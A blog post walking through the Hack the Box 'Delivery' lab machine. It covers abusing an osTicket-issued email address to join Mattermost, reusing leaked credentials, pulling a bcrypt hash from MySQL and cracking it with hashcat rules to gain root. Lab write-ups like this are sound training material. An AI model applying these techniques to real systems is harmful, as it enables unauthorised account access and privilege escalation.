Hack the Box – Delivery

Delivery was an easy-rated Linux box by ippsec. Despite being an easy box, it had a clever path to user that relies on hacking business processes, rather than software to get to user, and tries to teach something about hashcat to escalate to root.

Initial Enumeration

An initial nmap showed ports 22, 80 and 8065 open

root@kali-e:/home/jmpalk/htb/delivery# nmap -v -n -Pn 10.10.10.222 -p1-65535
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 15:25 EDT
Initiating SYN Stealth Scan at 15:25
Scanning 10.10.10.222 [65535 ports]
Discovered open port 80/tcp on 10.10.10.222
Discovered open port 22/tcp on 10.10.10.222
Discovered open port 8065/tcp on 10.10.10.222
Completed SYN Stealth Scan at 15:25, 13.52s elapsed (65535 total ports)
Nmap scan report for 10.10.10.222
Host is up (0.023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds
           Raw packets sent: 65591 (2.886MB) | Rcvd: 65535 (2.621MB)
root@kali-e:/home/jmpalk/htb/delivery# 

Port 80 is the splash page for the delivery service. There’s not a lot there beyond the contact us blurb, which points toward the Help Desk, located at helpdesk.delivery.htb and the Mattermost server, which is the service running on port 8065.

The "contact us" block on delivery.htb, reading "For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.
THis is critical information

Going to the helpdesk page, you can submit tickets via the osticket ticketing system, even without having an account.

The osticket-based help desk system
You an submit a ticket via osticket

The MatterMost server requires you to have a @delivery.htb address in order to be able to register

The Mattermost chat system signin page
Access to MatterMost requires an @delivery.htb email address

Initial foothold

The Contact Us dialog on the landing page gives the key to getting into the box. I need a ‘@delivery.htb’ address to access MatterMost. But how to get that email address? The Help Desk will give me one.

I started by creating a ticket. The content of the ticket doesn’t matter.

Image of a ticket being submitted to the delivery.htb osticket instance
What I put in the ticket isn’t as important as what osticket puts in the ticket.

The key bit is what happens once I submit the ticket.

A ticket creation confirmation, including a note "if you want to add more information to your ticket, just email to 5213117@delivery.htb"
Thank you, osticket, for creating an @delivery.htb email address

Osticket creates an email address – 5213117@delivery.htb – that I can send updates to. Taking that address over to Mattermost, I can use it to create an account.

Creating a Mattermost account with the osticket-supplied email address.
Creating a Mattermost account with the osticket email address

Once I create the account, Mattermost informs me I need to visit an account validation link it sent to my email address. Osticket helpfully receives the email and displays it to me when I check the status on my ticket.

The Mattermost account validation email as an update to my helpdesk ticket
Thanks for taking messages for me, osticket!

I copy the link into my browser, hit enter, and my Mattermost account is validated and ready to go.

Mattermost showing that my account emaill address has been verified.
Ready to log into my new Mattermost account

Logging into Mattermost and joining the System team immediately provides some interesting information.

A Mattermost conversation showing themaildeliverer account password as "Youve_G0t_Mail!", and a warning not to use passwords with a variant of "PleaseSubscribe" as they're vulnerable to bruteforce attacks with hashcat rules.
Credentials for the box, and additional password guidance

The credentials for the box get me right in, and user.txt is right there.

jmpalk@kali-e:~/htb/delivery$ ssh maildeliverer@delivery.htb
The authenticity of host 'delivery.htb (10.10.10.222)' can't be established.
ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts.
Enter passphrase for key '/home/jmpalk/.ssh/id_rsa': 
maildeliverer@delivery.htb's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ 

Root

From the Mattermost comment, I have a good idea of what the password is going to look like, and that I’m going to need a hash to crack. This cuts my enumeration down substantially. I’m looking for notes, scripts and config files that might have passwords. Looking around the filesystem, I find the Mattermost config file at /opt/mattermost/config/config.json. It’s got a pretty big hint right in it.


"SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },

Using the provided username and password to log into MySQL, I query the user table.

Results of 'SELECT Username, Password FROM mattermost.Users'; Including a root user and hash.
Hey – look! A root user with password hash!

There’s a root hash in there. Feeding it into HashID, it comes back as blowfish, which is type 3200 in hashcat. The Mattermost note was warning people against using passwords vulnerable to hashcat rules. Hashcat rules allow one to programatically modify passwords being guessed, doing things like giving all the ‘leetspeak variations of words in a dictionary. You can come up with your own rules, but in this case, I used ‘best64’, one of the pre-written rules hashcat ships with.

PS C:\Program Files (x86)\hashcat-6.0.0> .\hashcat.exe -m 3200 .\delivery_hash.txt .\delivery-wl.txt -r .\rules\best64.rule
hashcat (v6.0.0) starting...

OpenCL API (OpenCL 2.1 AMD-APP (3075.13)) - Platform #1 [Advanced Micro Devices, Inc.]
======================================================================================
* Device #1: Ellesmere, 8128/8192 MB (6745 MB allocatable), 36MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Thu May 13 11:24:48 2021 (35 secs)
Time.Estimated...: Thu May 13 11:25:23 2021 (0 secs)
Guess.Base.......: File (.\delivery-wl.txt)
Guess.Mod........: Rules (.\rules\best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        1 H/s (6.41ms) @ Accel:1 Loops:4 Thr:8 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:1020-1024
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util:  5% Core:1347MHz Mem:2000MHz Bus:16

Started: Thu May 13 11:24:42 2021
Stopped: Thu May 13 11:25:24 2021

It came back with a hit in about 42 seconds: “PleaseSubscribe!21”. Going back to my shell, I su’d to root, and it was done.

maildeliverer@Delivery:/opt/mattermost/config$ su
Password: 
root@Delivery:/opt/mattermost/config# cd
root@Delivery:~# ls
mail.sh  note.txt  py-smtp.py  root.txt
root@Delivery:~# cat root.txt
bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa
root@Delivery:~# 

Again, a clever little path to user, and doing something I hadn’t done before with hashcat rules. Thanks, ippsec!

-30-

Author: TheKilt

Information Security, Cosmic Horror, Gaming, Homebrewing, BBQ

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: